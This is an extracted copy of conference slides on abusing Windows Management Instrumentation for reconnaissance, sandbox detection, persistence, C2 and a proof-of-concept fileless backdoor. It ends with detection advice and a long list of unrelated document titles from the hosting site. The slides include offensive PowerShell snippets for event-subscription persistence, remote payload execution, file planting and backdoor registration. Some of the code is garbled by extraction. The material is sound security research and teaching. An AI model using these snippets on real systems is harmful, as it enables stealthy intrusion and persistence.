Abusing Windows Management Instrumentation (WMI) to Build a Persistent, Asynchronous, and Fileless Backdoor. Matt Graeber
|
|
|
- Jade Harper
- 9 years ago
- Views:
Transcription
1
2 Abusing Windows Management Instrumentation (WMI) to Build a Persistent, Asynchronous, and Fileless Backdoor Matt Graeber
3 Disclaimer While the code and techniques discussed today are offensive in nature, I will take great care to discuss defensive measures and solutions as well. That said Defense, FTW!!! Go see our talk at DEF CON 23! WhyMI so Sexy? WMI Attacks, Real-Time Defense, and Advanced Forensic Analysis Saturday, August 1300 Track 3
4 Fact - Attackers are abusing WMI 1. You may not be aware of this fact. 2. You may not know WMI is. 3. You may not know how to prevent and detect such attacks. 4. You may only be aware of its malicious capabilities as described in public reports.
5 Matt Graeber Reverse FireEye Labs Advanced Reverse Engineering ( ) Team Speaker Black Hat, DEF CON, Microsoft Blue Hat, BSides LV and Augusta, DerbyCon Black Hat Trainer Microsoft MVP PowerShell GitHub projects PowerSploit, PowerShellArsenal, Position Independent Shellcode in C, etc.
6 Sophisticated attackers are living off the land Increasingly, attackers are becoming more proficient system administrators than our system administrators. A tool that s useful to a sysadmin is useful to an attacker.
7 Motivation As a offensive researcher, if you can dream it, someone has likely already done it and that someone isn t the kind of person who speaks at security cons
8 Outline 1. Abridged History of WMI Malware 2. WMI Architecture 3. WMI Interaction 4. WMI Query Language (WQL) 5. WMI Eventing 6. Remote WMI 7. WMI Attacks 8. Providers 9. PoC WMI backdoor 10.Detection and Mitigations
9 WMI Malware History
10 Stuxnet Exploited MS Windows Printer Spooler Exploited an arbitrary file write vulnerability WMI provided a generic means of turning a file write to SYSTEM code execution! The attackers dropped a MOF file to gain SYSTEM-level execution. Microsoft fixed this exploit primitive
11 Ghost Utilized permanent WMI event subscriptions to: Monitor changes to Recent folder Compressed and uploaded all new documents Activates an ActiveX control that uses IE as a C2 channel
12 2014 WMI Shell (Andrei Dumitrescu) Uses WMI as a C2 channel Clever use of WMI namespaces stage data exfil
13 WMI Basics
14 WMI Basics Introduction Windows Management Instrumentation Powerful local & remote system management infrastructure Present since Win98 and NT4. Seriously. Can be used to: Obtain system information Registry File system Etc. Execute commands Subscribe to events
15 WMI Basics - Architecture WMI implements the CIM and WBEM standards to do the following: Provide an object schema to describe managed components Provide a means to populate objects i.e. WMI providers Store persistent objects WMI/CIM repository Query objects WQL Transmit object data DCOM and WinRM Perform actions on objects class methods, events, etc. Persistent WMI objects are stored in the WMI repository %SystemRoot%\System32\wbem\Repository\OBJECTS.DATA Valuable for forensics yet no parsers exist until now! WMI Settings HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM Win32_WmiSetting class
16 WMI Basics - Architecture Persistent WMI objects are stored in the WMI repository %SystemRoot%\System32\wbem\Repository\OBJECTS.DATA Valuable for forensics yet no parsers exist until now! WMI Settings HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM Win32_WmiSetting class E.g. AutoRecover MOFs are listed here
17
18 Interacting with WMI
19 Utilities - PowerShell Blue is the New Black
20 Utilities wmic.exe Pentesters and attackers know about this Installed everywhere Gets most tasks done Has some limitations
21 Utilities - Sapien WMI Explorer Commercial utility Great for WMI discovery/research Many additional features
22 Utilities wbemtest.exe The WMI utility you never heard of GUI Very powerful Rarely a blacklisted application
23 Utilities winrm.exe Not a well known utility Can interface with WMI over WinRM Useful if PowerShell is not available winrm invoke Create winrm enumerate winrm get
24 Utilities Linux - wmic, wmis, wmis-pth (@passingthehash) Windows Script Host Languages VBScript JScript IWbem* COM API.NET System.Management classes
25 Remote WMI
26 Remote WMI Protocols - DCOM DCOM connections established on port 135 Subsequent data exchanged on port dictated by HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\Internet Ports (REG_MULTI_SZ) configurable via DCOMCNFG.exe Not firewall friendly By default, the WMI service Winmgmt is running and listening on port 135
27 Remote WMI Protocols - DCOM
28 Remote WMI Protocols - WinRM/PowerShell Remoting SOAP protocol based on the WSMan specification Encrypted by default Single management port 5985 (HTTP) or 5986 (HTTPS) The official remote management protocol in Windows 2012 R2+ SSH on steroids Supports WMI and code execution, object serialization Scriptable configuration via WSMan drive in PowerShell
29 Remote WMI Protocols - WinRM/PowerShell Remoting
30 Remote WMI Protocols - WinRM/PowerShell Remoting
31 Remote WMI Protocols - DCOM DCOM connections established on port 135 Subsequent data exchanged on port dictated by HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\Internet Ports (REG_MULTI_SZ) configurable via DCOMCNFG.exe Not firewall friendly By default, the WMI service Winmgmt is running and listening on port 135
32 WMI Eventing
33 WMI Eventing WMI has the ability to trigger off nearly any conceivable event. Great for attackers and defenders Three requirements 1. Filter An action to trigger off of 2. Consumer An action to take upon triggering the filter 3. Binding Registers a Filter Consumer Local events run for the lifetime of the host process. Permanent WMI events are persistent and run as SYSTEM.
34 WMI Event Type - Intrinsic Intrinsic events are system classes included in every namespace Attacker/defender can make a creative use of these Must be captured at a polling interval. Use carefully. Possible to miss event firings. NamespaceOperationEvent NamespaceModificationEvent NamespaceDeletionEvent NamespaceCreationEvent ClassOperationEvent ClassDeletionEvent ClassModificationEvent ClassCreationEvent InstanceOperationEvent InstanceCreationEvent MethodInvocationEvent InstanceModificationEvent InstanceDeletionEvent TimerEvent
35 WMI Event Type - Extrinsic Extrinsic events are non-system classes that fire immediately No chance of missing these Generally don t include as much information Notable extrinsic events: Consider the implications ROOT\CIMV2:Win32_ComputerShutdownEvent ROOT\CIMV2:Win32_IP4RouteTableEvent ROOT\CIMV2:Win32_ProcessStartTrace ROOT\CIMV2:Win32_ModuleLoadTrace ROOT\CIMV2:Win32_ThreadStartTrace ROOT\CIMV2:Win32_VolumeChangeEvent ROOT\CIMV2:Msft_WmiProvider* ROOT\DEFAULT:RegistryKeyChangeEvent ROOT\DEFAULT:RegistryValueChangeEvent
36 WMI Event - Filters The definition of the event to trigger Takes the form of a WMI query Be mindful of performance! These take some practice Intrinsic query SELECT * FROM InstanceOperationEvent WITHIN 30 WHERE (( CLASS = " InstanceCreationEvent" OR CLASS = " InstanceModificationEvent") AND TargetInstance ISA "CIM_DataFile") AND (TargetInstance.Extension = "doc") OR (TargetInstance.Extension = "docx") Extrinsic query SELECT * FROM Win32_VolumeChangeEvent WHERE EventType = 2
37 WMI Event - Consumers The action taken upon firing an event These are the standard event consumers: LogFileEventConsumer ActiveScriptEventConsumer NTEventLogEventConsumer SMTPEventConsumer CommandLineEventConsumer Present in the following namespaces: ROOT\CIMV2 ROOT\DEFAULT
38 WMI Attacks
39 WMI Attacks From an attackers perspective, WMI can be used but is not limited to the following: Reconnaissance VM/Sandbox Detection Code execution and lateral movement Persistence Data storage C2 communication
40 WMI Benefits to an Attacker Service enabled and remotely available on all Windows systems by default Runs as SYSTEM Relatively esoteric persistence mechanism Other than insertion into the WMI repository, nothing touches disk Defenders are generally unaware of WMI as an attack vector Uses an existing, non-suspicious protocol Nearly everything on the operating system is capable of triggering a WMI event
41 WMI Attacks Reconnaissance Host/OS information: ROOT\CIMV2:Win32_OperatingSystem, Win32_ComputerSystem, ROOT\CIMV2:Win32_BIOS File/directory listing: ROOT\CIMV2:CIM_DataFile Disk volume listing: ROOT\CIMV2:Win32_Volume Registry operations: ROOT\DEFAULT:StdRegProv Running processes: ROOT\CIMV2:Win32_Process Service listing: ROOT\CIMV2:Win32_Service Event log: ROOT\CIMV2:Win32_NtLogEvent Logged on accounts: ROOT\CIMV2:Win32_LoggedOnUser Mounted shares: ROOT\CIMV2:Win32_Share Installed patches: ROOT\CIMV2:Win32_QuickFixEngineering Installed AV: ROOT\SecurityCenter[2]:AntiVirusProduct
42 WMI Attacks VM/Sandbox Detection Sample WQL Queries SELECT * FROM Win32_ComputerSystem WHERE TotalPhysicalMemory < SELECT * FROM Win32_ComputerSystem WHERE NumberOfLogicalProcessors < 2 Example $VMDetected = $False $Arguments Class = 'Win32_ComputerSystem' Filter = 'NumberOfLogicalProcessors < 2 AND TotalPhysicalMemory < ' } if { $VMDetected = $True }
43 WMI Attacks VM/Sandbox Detection (VMware) Sample WQL Queries SELECT * FROM Win32_NetworkAdapter WHERE Manufacturer LIKE "%VMware%" SELECT * FROM Win32_BIOS WHERE SerialNumber LIKE "%VMware%" SELECT * FROM Win32_Process WHERE Name="vmtoolsd.exe" SELECT * FROM Win32_NetworkAdapter WHERE Name LIKE "%VMware% Example $VMwareDetected = $False $VMAdapter = Get-WmiObject Win32_NetworkAdapter -Filter 'Manufacturer LIKE "%VMware%" OR Name LIKE "%VMware%"' $VMBios = Get-WmiObject Win32_BIOS -Filter 'SerialNumber LIKE "%VMware%"' $VMToolsRunning = Get-WmiObject Win32_Process -Filter 'Name="vmtoolsd.exe"' if ($VMAdapter -or $VMBios -or $VMToolsRunning) { $VMwareDetected = $True }
44 WMI Attacks Code Execution and Lateral Movement
45 WMI Attacks Persistence SEADADDY (Mandiant family name) sample $filtername = 'BotFilter82' $consumername = 'BotConsumer23' $exepath = 'C:\Windows\System32\evil.exe' $Query = "SELECT * FROM InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 200 AND TargetInstance.SystemUpTime < 320" $WMIEventFilter = Set-WmiInstance -Class EventFilter -NameSpace "root\subscription" -ErrorAction Stop $WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" Set-WmiInstance -Class FilterToConsumerBinding -Namespace "root\subscription" Modified from:
46 WMI Attacks Data Storage $StaticClass = New-Object Management.ManagementClass('root\cimv2', $null, $null) $StaticClass.Name = 'Win32_EvilClass' $StaticClass.Put() $StaticClass.Properties.Add('EvilProperty', "This is not the malware you're looking for") $StaticClass.Put()
47 WMI Attacks C2 Communication WMI is a fantastic C2 channel! The following can be used to stage exfil Namespace WMI Shell already does it WMI class creation One group already kind of does it Registry No one I know of is doing this Ideas? Let s chat
48 WMI Attacks C2 Communication (WMI Class) Push Attack Push file contents to remote WMI repository # Prep file to drop on remote system $LocalFilePath = 'C:\Users\ht\Documents\evidence_to_plant.png' $FileBytes = [IO.File]::ReadAllBytes($LocalFilePath) $EncodedFileContentsToDrop = [Convert]::ToBase64String($FileBytes) # Establish remote WMI connection $Options = New-Object Management.ConnectionOptions $Options.Username = 'Administrator' $Options.Password = 'user' $Options.EnablePrivileges = $True $Connection = New-Object Management.ManagementScope $Connection.Path = '\\ \root\default' $Connection.Options = $Options $Connection.Connect() # "Push" file contents $EvilClass = New-Object Management.ManagementClass($Connection, [String]::Empty, $null) $EvilClass[' CLASS'] = 'Win32_EvilClass' $EvilClass.Properties.Add('EvilProperty', [Management.CimType]::String, $False) $EvilClass.Properties['EvilProperty'].Value = $EncodedFileContentsToDrop $EvilClass.Put()
49 WMI Attacks C2 Communication (WMI Class) Push Attack Drop file contents to remote system $Credential = Get-Credential 'WIN-B85AAA7ST4U\Administrator' $CommonArgs Credential = $Credential ComputerName = ' ' } $PayloadText $EncodedFile = ([WmiClass] 'root\default:win32_evilclass').properties['evilproperty'].value [IO.File]::WriteAllBytes('C:\fighter_jet_specs.png', [Convert]::FromBase64String($EncodedFile)) '@ $EncodedPayload = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($PayloadText)) $PowerShellPayload = "powershell -NoProfile -EncodedCommand $EncodedPayload" # Drop it like it's hot -Class Win32_Process -Name Create -ArgumentList $PowerShellPayload # Confirm successful file drop -Class CIM_DataFile -Filter 'Name = "C:\\fighter_jet_specs.png"'
50 WMI Attacks C2 Communication (Registry) Pull Attack Create a registry key remotely $Credential = Get-Credential 'WIN-B85AAA7ST4U\Administrator' $CommonArgs Credential = $Credential ComputerName = ' ' } $HKLM = Class StdRegProv -Name CreateKey -ArgumentList $HKLM, 'SOFTWARE\EvilKey -Class StdRegProv -Name DeleteValue -ArgumentList $HKLM, 'SOFTWARE\EvilKey', 'Result'
51 WMI Attacks C2 Communication (Registry) Pull Attack Store payload data in registry value and retrieve it $PayloadText $Payload = {Get-Process lsass} $Result = & $Payload $Output = [Management.Automation.PSSerializer]::Serialize($Result, 5) $Encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($Output)) Set-ItemProperty -Path HKLM:\SOFTWARE\EvilKey -Name Result -Value $Encoded '@ $EncodedPayload = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($PayloadText)) $PowerShellPayload = "powershell -NoProfile -EncodedCommand $EncodedPayload" -Class Win32_Process -Name Create -ArgumentList $PowerShellPayload $RemoteOutput = -Class StdRegProv -Name GetStringValue - ArgumentList $HKLM, 'SOFTWARE\EvilKey', 'Result' $EncodedOutput = $RemoteOutput.sValue $DeserializedOutput = [Management.Automation.PSSerializer]::Deserialize([Text.Encoding]::Ascii.GetString([Convert]::F rombase64string($encodedoutput)))
52 WMI Attacks Stealthy Command Push Problem: Previous examples might get caught with command-line auditing e.g. powershell.exe invocation Solution: Create a temporary permanent WMI event subscription Event filter example: IntervalTimerInstruction Event consumer ActiveScriptEventConsumer: 1. Execute pushed payload 2. Immediately delete the permanent event subscription Effect: Calls %SystemRoot%\system32\wbem\scrcons.exe -Embedding Implementation: Exercise for the reader
53 WMI Attacks MOF Why aren t you talking about malicious managed object format (MOF) files???
54 WMI Providers
55 WMI Providers COM DLLs that form the backend of the WMI architecture Nearly all WMI classes and their methods are backed by a provider Unique GUID associated with each provider GUIDs may be found in MOF files or queried programmatically GUID corresponds to location in registry HKEY_CLASSES_ROOT\CLSID\<GUID>\InprocServer32 (default) Extend the functionality of WMI all while using its existing infrastructure New providers create new Win32Provider : Provider instances Kernel drivers host classes present in ROOT\WMI
56 3 rd Party WMI Providers Some 3 rd party providers exist E.g. Lenovo has one installed on this laptop Enables remote get/set of BIOS configuration
57 Malicious WMI Providers This was merely a theoretical attack vector until recently EvilWMIProvider by Casey Smith (@subtee) PoC shellcode runner Invoke-WmiMethod -Class Win32_Evil -Name ExecShellcode 0x90, 0x90), $null EvilNetConnectionWMIProvider by Jared Atkinson (@jaredcatkinson) PoC PowerShell runner and network connection lister Invoke-WmiMethod -Class Win32_NetworkConnection - Name RunPs -ArgumentList 'whoami', $null Get-WmiObject -Class Win32_NetworkConnection Install with InstallUtil.exe
58 WMI Provider Enumeration Get-WmiProvider.ps1
59 PoC WMI Backdoor
60 PoC WMI Backdoor Background A pure WMI backdoor PowerShell installer PowerShell not required on victim Intuitive syntax Relies exclusively upon permanent WMI event subscriptions
61 PoC WMI Backdoor Syntax - New-WMIBackdoorTrigger New-WMIBackdoorTrigger -TimingInterval <uint32> [-TimerName <string>] [-TriggerName <string>] New-WMIBackdoorTrigger -Datetime <datetime> [-TimerName <string>] [-TriggerName <string>] New-WMIBackdoorTrigger -ProcessName <string> [-TriggerName <string>] New-WMIBackdoorTrigger -NewOrModifiedFileExtensions <string[]> [-TriggerName <string>] New-WMIBackdoorTrigger LockedScreen [-TriggerName <string>] New-WMIBackdoorTrigger InteractiveLogon [-TriggerName <string>] New-WMIBackdoorTrigger DriveInsertion [-TriggerName <string>]
62 PoC WMI Backdoor Syntax - New-WMIBackdoorAction New-WMIBackdoorAction -C2Uri <uri> -FileUpload [-ActionName <string>] New-WMIBackdoorAction -C2Uri <uri> -Backdoor [-ActionName <string>] New-WMIBackdoorAction -KillProcess [-ActionName <string>] New-WMIBackdoorAction -InfectDrive [-ActionName <string>]
63 PoC WMI Backdoor Syntax Register-WMIBackdoor Register-WMIBackdoor [-Trigger] <hashtable> [-Action] <hashtable> [[-ComputerName] <string>]
64 PoC WMI Backdoor - Examples $Trigger1 = New-WMIBackdoorTrigger -NewOrModifiedFileExtensions 'txt', 'doc' $Action1 = New-WMIBackdoorAction -C2Uri ' -FileUpload $Registration1 = Register-WMIBackdoor -Trigger $Trigger1 -Action $Action1 $Trigger2 = New-WMIBackdoorTrigger -TimingInterval 1 $Action2 = New-WMIBackdoorAction -C2Uri ' -Backdoor $Registration2 = Register-WMIBackdoor -Trigger $Trigger2 -Action $Action2 $Trigger3 = New-WMIBackdoorTrigger -ProcessName 'procexp64.exe' $Action3 = New-WMIBackdoorAction -KillProcess $Registration3 = Register-WMIBackdoor -Trigger $Trigger3 -Action $Action3 $Trigger4 = New-WMIBackdoorTrigger -DriveInsertion $Action4 = New-WMIBackdoorAction -InfectDrive $Registration4 = Register-WMIBackdoor -Trigger $Trigger4 -Action $Action4
65 Attack Defense and Mitigations
66 Attacker Detection with WMI Persistence is still the most common WMI-based attack Use WMI to detect WMI persistence $Arguments Credential = 'WIN-B85AAA7ST4U\Administrator' ComputerName = ' ' Namespace = 'root\subscription' } Get-WmiObject -Class Get-WmiObject -Class Get-WmiObject -Class
67 Existing Detection Utilities Sysinternals Autoruns Kansa Dave Hull Jon Turner
68 Attacker Detection with WMI WMI is the free, agent-less host IDS that you never knew existed!
69 Mitigations Stop the WMI service - Winmgmt? Firewall rules Existing Event logs Microsoft-Windows-WinRM/Operational Microsoft-Windows-WMI-Activity/Operational Microsoft-Windows-DistributedCOM Preventative permanent WMI event subscriptions
70 Mitigations
71 Mitigations
72 Thank you! Valuable input on useful EventFilters i.e. malicious event triggers Justin Warner Will Schroeder For bringing malicious WMI providers from theory to reality Casey Smith Jared Atkinson To all defenders taking WMI seriously
73 Questions?
Abusing Windows Management Instrumentation (WMI) to Build a Persistent, Asyncronous, and Fileless Backdoor
Abusing Windows Management Instrumentation (WMI) to Build a Persistent, Asyncronous, and Fileless Backdoor Matt Graeber Black Hat 2015 Introduction As technology is introduced and subsequently deprecated
Integrating HP Insight Management WBEM (WMI) Providers for Windows with HP System Insight Manager
Integrating HP Insight Management WBEM (WMI) Providers for Windows with HP System Insight Manager Integration note, 4 th edition Introduction... 2 Utilizing HP WBEM Providers for Windows... 2 Security...
WHITE PAPER. INVESTIGATING POWERSHELL ATTACKS Black Hat USA 2014. Authors: Ryan Kazanciyan, Matt Hastings SECURITY REIMAGINED
WHITE PAPER INVESTIGATING POWERSHELL ATTACKS Black Hat USA 2014 Authors: Ryan Kazanciyan, Matt Hastings SECURITY REIMAGINED CONTENTS Introduction and Prior Research...3 Assumptions...4 Testing Methodology...5
Investigating PowerShell Attacks
Investigating PowerShell Attacks Ryan Kazanciyan, Matt Hastings Black Hat USA 2014 TABLE OF CONTENTS Introduction and Prior Research... 2 Assumptions... 3 Testing Methodology... 4 Findings and Sources
Who DIT It? Detecting and Mitigating Privilege Escalation Attacks on the Active Directory Data Store
Who DIT It? Detecting and Mitigating Privilege Escalation Attacks on the Active Directory Data Store Mike Middleton Justin Prosco Mandiant, A FireEye Company Mike Middleton Principal Consultant Joined
Web Services for Management Perl Library VMware ESX Server 3.5, VMware ESX Server 3i version 3.5, and VMware VirtualCenter 2.5
Technical Note Web Services for Management Perl Library VMware ESX Server 3.5, VMware ESX Server 3i version 3.5, and VMware VirtualCenter 2.5 In the VMware Infrastructure (VI) Perl Toolkit 1.5, VMware
Integration of Nagios monitoring tools with IBM's solutions
Integration of Nagios monitoring tools with IBM's solutions Wojciech Kocjan IBM Corporation [email protected] 1 Agenda Introduction Integration bottlenecks Why open standards? CIM and WBEM Open
Centralizing Windows Events with Event Forwarding
1 Centralizing Windows Events with Event Forwarding 2 Copyright Notice The information contained in this document ( the Material ) is believed to be accurate at the time of printing, but no representation
Monitoring Windows Servers and Applications with GroundWork Monitor Enterprise 6.7. Product Application Guide October 8, 2012
Monitoring Windows Servers and Applications with GroundWork Monitor Enterprise 6.7 Product Application Guide October 8, 2012 Table of Contents Introduction...3 Definitions and Abbreviations...3 GroundWork
Recommended Practice Case Study: Cross-Site Scripting. February 2007
Recommended Practice Case Study: Cross-Site Scripting February 2007 iii ACKNOWLEDGEMENT This document was developed for the U.S. Department of Homeland Security to provide guidance for control system cyber
Check list for web developers
Check list for web developers Requirement Yes No Remarks 1. Input Validation 1.1) Have you done input validation for all the user inputs using white listing and/or sanitization? 1.2) Does the input validation
Windows 7, Enterprise Desktop Support Technician Course 50331: 5 days; Instructor-led
Lincoln Land Community College Capital City Training Center 130 West Mason Springfield, IL 62702 217-782-7436 www.llcc.edu/cctc Windows 7, Enterprise Desktop Support Technician Course 50331: 5 days; Instructor-led
PowerShell for Penetration Testers
Training: PowerShell for Penetration Testers Dates of the training: March 14-15,2016 in Heidelberg, Germany Book Now using the code: TR16HMTRAINING and save an additional 10% of the current valid rate!
Investigating PowerShell Attacks
Investigating PowerShell Attacks Matt Hastings October 7, 2014 Background Case Study Attacker Client Victim VPN WinRM, SMB, NetBIOS Victim workstations, servers Fortune 100 organization Compromised for
IBM Security. How BigFix Helps Investigate a Threat in Forensic Activities IBM
IBM Security How BigFix Helps Investigate a Threat in Forensic Activities IBM Document Author, Contributors, and Reviewers AUTHOR: Cristina Bonanni CONTRIBUTORS: Bernardo Pastorelli, Bradford Fisher, Rosario
One-Man Shop. How to build a functional security program with limited resources DEF CON 22
One-Man Shop How to build a functional security program with limited resources DEF CON 22 One-Man Shop Agenda Caveats & Considerations People and Processes Network Architecture System Design Continuous
Comprehensive Malware Detection with SecurityCenter Continuous View and Nessus. February 3, 2015 (Revision 4)
Comprehensive Malware Detection with SecurityCenter Continuous View and Nessus February 3, 2015 (Revision 4) Table of Contents Overview... 3 Malware, Botnet Detection, and Anti-Virus Auditing... 3 Malware
Can Consumer AV Products Protect Against Critical Microsoft Vulnerabilities?
ANALYST BRIEF Can Consumer AV Products Protect Against Critical Microsoft Vulnerabilities? Author Randy Abrams Tested Products Avast Internet Security 7 AVG Internet Security 2012 Avira Internet Security
Post-Access Cyber Defense
Post-Access Cyber Defense Dr. Vipin Swarup Chief Scientist, Cyber Security The MITRE Corporation November 2015 Approved for Public Release; Distribution Unlimited. 15-3647. 2 Cyber Security Technical Center
"Charting the Course... ... to Your Success!" MOC 50331 D Windows 7 Enterprise Desktop Support Technician Course Summary
Description Course Summary This course provides students with the knowledge and skills needed to isolate, document and resolve problems on a Windows 7 desktop or laptop computer. It will also help test
Exploiting Transparent User Identification Systems
Exploiting Transparent User Identification Systems Wayne Murphy Benjamin Burns Version 1.0a 1 CONTENTS 1.0 Introduction... 3 1.1 Project Objectives... 3 2.0 Brief Summary of Findings... 4 3.0 Background
External Vulnerability Assessment. -Technical Summary- ABC ORGANIZATION
External Vulnerability Assessment -Technical Summary- Prepared for: ABC ORGANIZATI On March 9, 2008 Prepared by: AOS Security Solutions 1 of 13 Table of Contents Executive Summary... 3 Discovered Security
Penetration Testing. NTS330 Unit 1 Penetration V1.0. February 20, 2011. Juan Ortega. Juan Ortega, [email protected]. 1 Juan Ortega, juaorteg@uat.
1 Penetration Testing NTS330 Unit 1 Penetration V1.0 February 20, 2011 Juan Ortega Juan Ortega, [email protected] 1 Juan Ortega, [email protected] 2 Document Properties Title Version V1.0 Author Pen-testers
Penetration Testing Report Client: Business Solutions June 15 th 2015
Penetration Testing Report Client: Business Solutions June 15 th 2015 Acumen Innovations 80 S.W 8 th St Suite 2000 Miami, FL 33130 United States of America Tel: 1-888-995-7803 Email: [email protected]
Windows 7, Enterprise Desktop Support Technician
Course 50331D: Windows 7, Enterprise Desktop Support Technician Page 1 of 11 Windows 7, Enterprise Desktop Support Technician Course 50331D: 4 days; Instructor-Led Introduction This four-day instructor-ledcourse
Altiris Monitor Solution for Servers 7.1 SP1 and Event Console 7.1 MR1 from Symantec Release Notes
Altiris Monitor Solution for Servers 7.1 SP1 and Event Console 7.1 MR1 from Symantec Release Notes Altiris Monitor Solution for Servers 7.1 SP1 and Event Console 7.1 MR1 from Symantec Release Notes The
Server Manager Performance Monitor. Server Manager Diagnostics Page. . Information. . Audit Success. . Audit Failure
Server Manager Diagnostics Page 653. Information. Audit Success. Audit Failure The view shows the total number of events in the last hour, 24 hours, 7 days, and the total. Each of these nodes can be expanded
Using WMI Scripting. W indows Management Instrumentation (WMI) is the. for System Administration
Using WMI Scripting for System Administration Windows Management Instrumentation (WMI), which offers administrators a rich management scripting tool set, is an integral part of the Microsoft Windows family
Course Description. Course Audience. Course Outline. Course Page - Page 1 of 12
Course Page - Page 1 of 12 Windows 7 Enterprise Desktop Support Technician M-50331 Length: 5 days Price: $2,795.00 Course Description This five-day instructor-led course provides students with the knowledge
INDUSTRIAL CONTROL SYSTEMS CYBER SECURITY DEMONSTRATION
INDUSTRIAL CONTROL SYSTEMS CYBER SECURITY DEMONSTRATION Prepared for the NRC Fuel Cycle Cyber Security Threat Conference Presented by: Jon Chugg, Ken Rohde Organization(s): INL Date: May 30, 2013 Disclaimer
Server Management with Lenovo ThinkServer System Manager
Server Management with Lenovo ThinkServer System Manager For next-generation Lenovo ThinkServer systems Lenovo Enterprise Product Group Version 1.0 September 2014 2014 Lenovo. All rights reserved. LENOVO
BMC Performance Manager Windows Security White Paper DCOM / WMI
BMC Performance Manager Windows Security White Paper DCOM / WMI Problem The IT department delivers user IT services to their internal and external customers. The IT department wants to maintain control
Attackers are reusing attacks (because they work)
The Problem Attackers are reusing attacks (because they work) Defenders are collecting and/or sharing information, but Often a manual process (copy-paste from a PDF) Different sources provide different
Black Box Penetration Testing For GPEN.KM V1.0 Month dd "#$!%&'(#)*)&'+!,!-./0!.-12!1.03!0045!.567!5895!.467!:;83!-/;0!383;!
Sample Penetration Testing Report Black Box Penetration Testing For GPEN.KM V1.0 Month dd "#$%&'#)*)&'+,-./0.-121.030045.5675895.467:;83-/;0383; th, yyyy A&0#0+4*M:+:#&*#0%+C:,#0+4N:
Microsoft Windows PowerShell v2 For Administrators
Course 50414B: Microsoft Windows PowerShell v2 For Administrators Course Details Course Outline Module 1: Introduction to PowerShell the Basics This module explains how to install and configure PowerShell.
ANNEXURE-1 TO THE TENDER ENQUIRY NO.: DPS/AMPU/MIC/1896. Network Security Software Nessus- Technical Details
Sub: Supply, Installation, setup and testing of Tenable Network Security Nessus vulnerability scanner professional version 6 or latest for scanning the LAN, VLAN, VPN and IPs with 3 years License/Subscription
Medical Device Security Health Imaging Digital Capture. Security Assessment Report for the Kodak DR V2.0
Medical Device Security Health Imaging Digital Capture Security Assessment Report for the Kodak DR V2.0 Version 1.0 Eastman Kodak Company, Health Imaging Group Page 1 Table of Contents Table of Contents
Learn Ethical Hacking, Become a Pentester
Learn Ethical Hacking, Become a Pentester Course Syllabus & Certification Program DOCUMENT CLASSIFICATION: PUBLIC Copyrighted Material No part of this publication, in whole or in part, may be reproduced,
WildFire Overview. WildFire Administrator s Guide 1. Copyright 2007-2015 Palo Alto Networks
WildFire Overview WildFire provides detection and prevention of zero-day malware using a combination of malware sandboxing and signature-based detection and blocking of malware. WildFire extends the capabilities
Firewall Builder Architecture Overview
Firewall Builder Architecture Overview Vadim Zaliva Vadim Kurland Abstract This document gives brief, high level overview of existing Firewall Builder architecture.
MONITORING WINDOWS WITH NETCRUNCH 7 P A G E 1
MONITORING WINDOWS WITH NETCRUNCH 7 P A G E 1 NetCrunch 7 can monitor Microsoft Windows systems without installing additional agents. However, due to tightened security rules, remote monitoring is possible
Introduction to Web Services
Department of Computer Science Imperial College London CERN School of Computing (icsc), 2005 Geneva, Switzerland 1 Fundamental Concepts Architectures & escience example 2 Distributed Computing Technologies
Metasploit The Elixir of Network Security
Metasploit The Elixir of Network Security Harish Chowdhary Software Quality Engineer, Aricent Technologies Shubham Mittal Penetration Testing Engineer, Iviz Security And Your Situation Would Be Main Goal
Windows PowerShell. 3.0 Step by Step. Ed Wilson
Windows PowerShell 3.0 Step by Step Ed Wilson Foreword Introduction xix xxi Chapter 1 Overview of Windows PowerShell 3.0 1 Understanding Windows PowerShell 1 Using cmdlets 3 Installing Windows PowerShell
Module 3: Resolve Software Failure This module explains how to fix problems with applications that have problems after being installed.
CÔNG TY CỔ PHẦN TRƯỜNG CNTT TÂN ĐỨC TAN DUC INFORMATION TECHNOLOGY SCHOOL JSC LEARN MORE WITH LESS! 50331 - Windows 7, Enterprise Desktop Support Technician Duration: 5 days About this Course This five-day
Click Studios. Passwordstate. Password Discovery, Reset and Validation. Requirements
Passwordstate Password Discovery, Reset and Validation Requirements This document and the information controlled therein is the property of Click Studios. It must not be reproduced in whole/part, or otherwise
RSA Security Analytics
RSA Security Analytics Event Source Log Configuration Guide Microsoft SQL Server Last Modified: Thursday, July 30, 2015 Event Source Product Information: Vendor: Microsoft Event Source: SQL Server Versions:
Introduction VITAL SIGNS FROM SAVISION / FAQS. 2014 Savision B.V. savision.com All rights reserved.
Rev 2.6.0 Introduction 2 VITAL SIGNS FROM SAVISION / FAQS 2014 Savision B.V. savision.com All rights reserved. This manual, as well as the software described in it, is furnished under license and may be
Contents Who Should Read this Book... 3 Credits:... 3 Introduction and background... 3 Lab Setup... 3 A primer on windows user privileges...
Contents Who Should Read this Book... 3 Credits:... 3 Introduction and background... 3 Lab Setup... 3 A primer on windows user privileges... 4 Standard user:... 5 Administrator... 5 SYSTEM... 5 User Access
Panda Perimeter Management Console. Guide for Partners
Panda Perimeter Management Console Guide for Partners Copyright notice Panda Security 2014. All rights reserved. Neither the documents nor the programs that you may access may be copied, reproduced, translated
Detecting Malware With Memory Forensics. Hal Pomeranz SANS Institute
Detecting Malware With Memory Forensics Hal Pomeranz SANS Institute Why Memory Forensics? Everything in the OS traverses RAM Processes and threads Malware (including rootkit technologies) Network sockets,
Penetration Testing Workshop
Penetration Testing Workshop Who are we? Carter Poe Nathan Ritchey Mahdi Shapouri Fred Araujo Outline Ethical hacking What is penetration testing? Planning Reconnaissance Footprinting Network Endpoint
Adjusting Prevention Policy Options Based on Prevention Events. Version 1.0 July 2006
Adjusting Prevention Policy Options Based on Prevention Events Version 1.0 July 2006 Table of Contents 1. WHO SHOULD READ THIS DOCUMENT... 4 2. WHERE TO GET MORE INFORMATION... 4 3. VERIFYING THE OPERATION
The Monitis Monitoring Agent ver. 1.2
